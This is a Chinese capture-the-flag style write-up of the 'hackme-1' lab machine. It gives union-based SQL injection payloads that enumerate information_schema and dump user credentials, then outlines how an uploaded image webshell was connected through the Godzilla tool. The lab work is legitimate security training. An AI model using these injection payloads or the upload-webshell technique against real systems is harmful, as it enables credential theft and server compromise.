首页 > 其他分享 >hackme-1靶机

hackme-1靶机

时间:2024-07-29 13:53:35浏览次数:12  
标签:union 0x7e Windows table 靶机 schema select hackme

目录扫描发现

该网址存放上传文件

注册一个账户,点击搜索

验证是否存在sql注入漏洞
Windows OS' and 1=1# 

Windows OS' and 1=2# 

存在sql注入漏洞  判断列数

Windows OS' order by 3#
Windows OS' order by 4#

所以,有3列;判断回显位置

-1'union select 1,2,3#

查看当前数据库:(webapphacking)

-1'union select database(),2,3#

查看库中的表

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

查看users表中的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='webapphacking' and table_name='users'#

查询这些字段

-1'union select group_concat(id,0x7e,user,0x7e,pasword,0x7e,name,0x7e,address),2,3 from users#

发现了一个超级admin用户,用md5解码解一下密码

登录超级用户

发现可以上传文件

文件上传漏洞

上传图片马到网站

抓包修改后缀

访问木马

将木马网址复制到哥斯拉中建立连接

连接成功

标签:union,0x7e,Windows,table,靶机,schema,select,hackme
From: https://blog.csdn.net/weixin_69065643/article/details/140768316

相关文章

  • Tomato靶机
    Tomato靶机对通网段进行主机发现:分别进行目录扫描:进行访问:发现有弹窗尝试抓包,发现没有任何参数,也不能进行爆破查找资料发现8080端口存在可访问的目录,一个一个点进去发现phpinfo文件查看源码有文件包含漏洞,且参数为flie尝试访问etc/passwd对此ip进行全端口扫描......
  • DC-2靶机详解
    DC-2信息搜集IP探测netdiscover-r192.168.179.0/24得到ip为192.168.179.133。端口探测先看开放了哪些端口。nmap-sT--min-rate10000-p-192.168.179.133有个7744不知道什么玩意儿。nmap两步走(udp不用扫了,没攻击思路了再说),详细端口扫描nmap-sT-sV......
  • 关于kali扫描不到靶机的解决方法
    关于kali扫描不到靶机的解决方法前情提要这里使用的都是VMware,因为Vulnhub的靶场都是适配于VirtualBox,因此在使用VMware开启Vulnhub的靶场的时候,靶机大概率会出现获取不到IP地址的情况,因此我们需要修改一些配置,来使得靶机可以获取IP地址。前提在开始之前我们首先要确保攻击......
  • DC-1靶机渗透
    DC-1环境搭建访问https://vulnhub.com,然后搜索DC,点入后可以看到对靶机的介绍下载镜像文件。用VM打开,把网络模式改为nat模式。然后开启虚拟机。靶机渗透信息搜集IP探测先查看靶机ip是什么,arp-scan,nmap都行arp-scan-lnmap-sn192.168.179.0/24#探测主机......
  • 【OSCP系列】OSCP靶机-driftingblues7_vh(原创)
    【OSCP系列】OSCP靶机—driftingblues7_vh原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、主机发现二、端口扫描1、快速扫描2、全端口扫描3、版本系统探测66端口是个python开放的http服务,80端口是http服务,但是重定向到了44......
  • 【OSCP系列】OSCP靶机-Cybersploit(原创)
    【OSCP系列】OSCP靶机-Cybersploit(原创)OSCP系列靶机—Cybersploit原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、主机发现二、端口扫描1、快速扫描nmap.exe-F192.168.31.512、全端口扫描3、服务版本识别nmap.exe-sV......
  • DC-2靶机通关
        最近一段时间我将会持续更新DC系列的靶机通关过程,大家如果也有正在玩儿这些靶机的可以关注一下作者,欢迎大家一起讨论学习!!!        1.实验环境:攻击机:kali2023.2靶机:DC-22.1扫描网段内的主机:2.2扫描靶机开放端口等信息:这里可以发现主机开放了两个端口一......
  • DC2靶机渗透报告
    概述测试目的测试范围序号系统IP1本地192.168.152.1282DC2192.168.152.132详细测试流程1、发现测试目标2、信息收集-A参数等同于-sV、-sC、-traceout扫描目标的服务版本以及使用默认脚本扫描-n参数不进行DNS反向解析、-Pn不进行主机ping发现、-p-扫描全端口3、漏洞利用开放一个80......
  • DC4靶机渗透测试报告
    概述测试目的测试范围序号系统IP1本地192.168.152.1282靶机DC4192.168.152.134详细测试流程1、发现测试目标2、信息收集开放了22端口和80端口访问80端口,发现没什么可用的,就用BP暴力破解最后得到密码是happy登录3、漏洞利用登录以后可以看到有执行命令的单选框,这个时候我们选择第一......
  • DC5靶机渗透测试报告
    概述测试目的测试范围序号系统IP1本机192.168.152.1282DC5靶机192.168.152.136详细测试流程1、发现测试目标2、信息收集3、漏洞利用访问80端口,这个页面我什么都没有发现,目录扫描好像也没什么用没办法,看一下大佬的WPVulnHub靶机DC-5打靶渗透测试详细过程_dc-5主机渗透试验-CSDN......